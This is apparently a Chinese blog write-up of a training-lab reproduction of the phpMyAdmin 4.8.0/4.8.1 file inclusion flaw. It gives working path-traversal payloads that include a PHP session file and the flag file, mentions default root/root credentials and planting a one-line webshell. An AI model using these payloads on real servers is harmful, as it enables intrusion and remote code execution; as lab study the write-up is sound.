- 漏洞复现
前言
今天依然有些累,最近很容易困乏。依然是一篇水文。
在墨者逛靶场的时候看到这个文件包含靶场,因为与PHPMyadmin相关,因此复现一波。
漏洞原理
漏洞原理涉及到PHP的代码部分出现问题,状态不好暂且跳过(不然怎么叫水文呢),直接进行复现。
漏洞复现
第一步,进入靶场。不出意外是一个PHPMyAdmin的管理页面,使用root/root弱口令登录到后台。
第二步,找到相应漏洞复现文章。
第三步,模仿复现文章进行复现。
根据题目背景可以知道是文件包含,如果是真实环境……首先得是PHP4.8.0和4.8.1版本,其次,得能登录到后台。
找到了相应的漏洞之后,按照复现文章进行复现。
直接快进到利用
首先在sql中执行语句,比如phpinfo
执行之后找到这个页面要包含的session文件名,在cookie里边可以找到
然后包含,index.php?target=db_sql.php%253f/../../../../../../../../tmp/tmp/sess_8q6a3sanco25u26716p3l1dtofs2r7lc
可以看到phpinfo包含成功
于是把写进去的语句换成一句话木马。
然后使用蚁剑连接……很生气,连接不上,浪费我睡觉时间。
凭借之前做的经验,知道flag在根目录下的key.txt里,爷直接文件包含读取。
index.php?target=db_sql.php%253f/../../../../../../../../key.txt
搞定睡觉!
结语
等之后有空了再来补其他的。